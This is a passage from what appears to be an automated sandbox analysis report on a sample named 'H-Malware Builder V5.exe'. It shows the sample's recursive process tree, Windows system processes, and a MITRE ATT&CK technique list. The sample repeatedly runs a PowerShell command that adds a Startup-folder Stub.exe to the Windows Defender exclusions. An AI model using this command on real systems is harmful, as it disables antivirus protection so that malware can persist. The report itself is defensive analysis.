        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        43⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        42⤵
        Checks computer location settings
        Drops startup file
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        43⤵
        Checks computer location settings
        
        PID:4276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2332
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        44⤵
        
        PID:4484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        45⤵
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        46⤵
        
        PID:3112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        47⤵
        
        PID:1292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:316
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        48⤵
        
        PID:5084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        49⤵
        
        PID:740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:700
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        50⤵
        
        PID:4452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        51⤵
        
        PID:1876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        52⤵
        
        PID:4456
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:760
- C:\Windows\System32\kpkopw.exe
  "C:\Windows\System32\kpkopw.exe"
  2⤵
  PID:4232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:4932
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0x118,0xf4,0x7ffdfdd9cc40,0x7ffdfdd9cc4c,0x7ffdfdd9cc58
    3⤵
    PID:1628
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:2
    3⤵
    PID:5104
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2228,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:3
    3⤵
    PID:456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2464 /prefetch:8
    3⤵
    PID:4872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
    3⤵
    PID:3864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3360,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3348 /prefetch:1
    3⤵
    PID:2780
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3772,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3744 /prefetch:1
    3⤵
    PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3664

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4008

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4548

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3780

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4180

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5108

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2372

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 118be8a46aabf8ea86f1c11083eed5b5 E5Lzf3E750CwH6qnTAd5Mw.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:1444
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2272

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:4308

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1432

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2688

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4772

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1020

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3676

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery